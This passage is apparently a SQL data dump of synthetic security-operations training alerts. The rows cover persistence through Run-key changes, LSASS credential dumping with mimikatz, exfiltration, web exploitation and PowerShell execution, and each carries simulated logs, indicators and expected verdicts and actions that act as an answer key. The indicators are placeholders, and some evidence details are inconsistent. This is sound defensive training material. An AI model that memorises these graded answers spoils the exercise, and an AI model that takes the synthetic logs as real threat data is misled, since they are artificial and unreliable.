Database\",\"verdict\":\"internal\",\"details\":\"User account on compromised system.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1287, 'Establishing Persistence with Registry Modifications', 'high', 'Registry Change Logs', 'To solidify their presence, Groundbait modifies registry settings on affected machines, ensuring the malware runs on startup and persists through reboots. The attacker has modified the registry to include the malware executable in the startup sequence.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T15:32:45Z\",\"event_id\":\"4624\",\"user\":\"compromised_user\",\"host_ip\":\"192.168.1.15\",\"malware_name\":\"Groundbait\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value\":\"Groundbait\",\"executable_path\":\"C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\groundbait.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"attacker_ip\":\"203.0.113.45\"}', '2026-02-24 03:14:42', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP associated with Groundbait operations.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"MD5 hash of the Groundbait malware executable.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"groundbait.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Executable associated with Groundbait malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Records\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.748Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:32:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"user\\\":\\\"compromised_user\\\",\\\"host_ip\\\":\\\"192.168.1.15\\\",\\\"malware_name\\\":\\\"Groundbait\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value\\\":\\\"Groundbait\\\",\\\"executable_path\\\":\\\"C:\\\\\\\\Users\\\\\\\\compromised_user\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\groundbait.exe\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1288, 'Credential Dumping for Lateral Movement', 'high', 'Security Information and Event Management (SIEM) Logs', 'Groundbait employs credential dumping techniques to harvest login information, allowing them to move laterally across the network and expand their surveillance scope. In this instance, a suspicious process was detected accessing LSASS memory on a domain controller.', 'Credential Access', 'T1003 - Credential Dumping', 1, 'new', NULL, '{\"timestamp\":\"2023-10-25T14:22:01Z\",\"event_id\":\"4624\",\"event_type\":\"Process Access\",\"computer_name\":\"DC01.corporate.local\",\"source_ip\":\"192.168.1.100\",\"target_process\":\"C:\\\\Windows\\\\System32\\\\lsass.exe\",\"attacker_tool\":\"mimikatz.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"attacker_ip\":\"203.0.113.45\",\"affected_user\":\"administrator@corporate.local\"}', '2026-02-24 03:14:42', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP address of a suspected compromised machine.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Public IP associated with Groundbait APT activity.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Mimikatz credential dumping tool.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"mimikatz.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"endpoint detection\",\"verdict\":\"malicious\",\"details\":\"Credential dumping tool detected on the network.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"administrator@corporate.local\",\"is_critical\":true,\"osint_result\":{\"source\":\"active directory logs\",\"verdict\":\"suspicious\",\"details\":\"Domain administrator account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:22:01Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Process Access\\\",\\\"computer_name\\\":\\\"DC01.corporate.local\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"target_process\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\lsass.exe\\\",\\\"attacker_tool\\\":\\\"mimikatz.exe\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"affected_user\\\":\\\"administrator@corporate.local\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1289, 'Data Exfiltration via Encrypted Channels', 'high', 'Network Traffic Analysis', 'In the final phase, Groundbait exfiltrates gathered intelligence using encrypted communication channels, avoiding detection and completing their espionage mission.', 'Exfiltration', 'T1048 - Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-09-15T14:45:32Z\",\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"203.0.113.5\",\"protocol\":\"TLS\",\"port\":443,\"file_hash\":\"a1b2c3d4e5f6071829304b5c6d7e8f90\",\"filename\":\"confidential_report.docx\",\"user\":\"jdoe\",\"action\":\"exfiltration\",\"bytes_transferred\":10485760,\"anomaly_score\":85}', '2026-02-24 03:14:42', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Log\",\"verdict\":\"internal\",\"details\":\"Internal IP address used by compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"a1b2c3d4e5f6071829304b5c6d7e8f90\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"File hash linked to Groundbait APT.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_report.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Documentation\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document transferred over encrypted channel.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"User Directory\",\"verdict\":\"internal\",\"details\":\"Internal user account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'intermediate', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1290, 'Unauthorized Access Detected on Ukrainian Infrastructure', 'high', 'Firewall logs', 'An attacker has begun an operation by exploiting a vulnerability in a public-facing web server of a Ukrainian infrastructure entity, seeking initial access to the network. The attacker used a known exploit targeting a web application flaw, allowing them to initiate a connection from a suspicious external IP address.', 'Initial Access', 'T1190 - Exploit Public-Facing Application', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-04T13:45:30Z\",\"src_ip\":\"185.142.236.34\",\"dst_ip\":\"192.168.1.10\",\"dst_port\":80,\"http_method\":\"GET\",\"url\":\"/vulnerable_endpoint\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36\",\"status_code\":200,\"response_size\":4532,\"malicious_payload\":\"d41d8cd98f00b204e9800998ecf8427e\",\"detected_signature\":\"CVE-2023-XXXX Exploit\"}', '2026-02-24 03:15:13', '2026-02-25 10:22:22', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.142.236.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple unauthorized access attempts.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal web server targeted by exploit.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known malicious payload hash.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1291, 'Suspicious PowerShell Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'An advanced threat actor executed a suspicious PowerShell script on an internal system, enabling microphone access for potential surveillance operations.', 'Execution', 'T1059.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"user\":\"jdoe\",\"source_ip\":\"192.168.1.42\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -NoProfile -File C:\\\\Temp\\\\EnableMic.ps1\",\"script_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"malicious_ip\":\"203.0.113.45\",\"file_name\":\"EnableMic.ps1\"}', '2026-02-24 03:15:13', '2026-02-25 10:24:17', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.42\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"This IP belongs to the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_database\",\"verdict\":\"suspicious\",\"details\":\"The hash matches a known suspicious script used for unauthorized surveillance.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"This IP is associated with known malicious activity.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"EnableMic.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"The PowerShell script is designed to enable microphone access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1292, 'Persistence Mechanism Established via Registry Modification', 'high', 'Registry change logs', 'To maintain access to the compromised system, the attacker modified the system registry keys to ensure a malicious script executes automatically upon system reboot. This persistence mechanism allows the attacker to regain access without manual intervention.', 'Persistence', 'T1547.001', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":4657,\"event_type\":\"Registry Value Change\",\"user\":\"COMPROMISED_USER\",\"registry_key\":\"HKEY_LOCAL_MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\"registry_value_name\":\"MaliciousScript\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\evilscript.exe\\\"\",\"process_name\":\"regedit.exe\",\"host_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-02-24 03:15:13', '2026-02-25 10:30:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP address with previous malicious activity\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"regedit.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"malicious\",\"details\":\"File path of the malware set for persistence\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"COMPROMISED_USER\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account used to modify registry keys\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value Change\\\",\\\"user\\\":\\\"COMPROMISED_USER\\\",\\\"registry_key\\\":\\\"HKEY_LOCAL_MACHINE\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\\\\",\\\"registry_value_name\\\":\\\"MaliciousScript\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\evilscript.exe\\\\\\\"\\\",\\\"process_name\\\":\\\"regedit.exe\\\",\\\"host_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.754Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:32:45Z\\\",\\\"event_id\\\":4657,\\\"event_type\\\":\\\"Registry Value 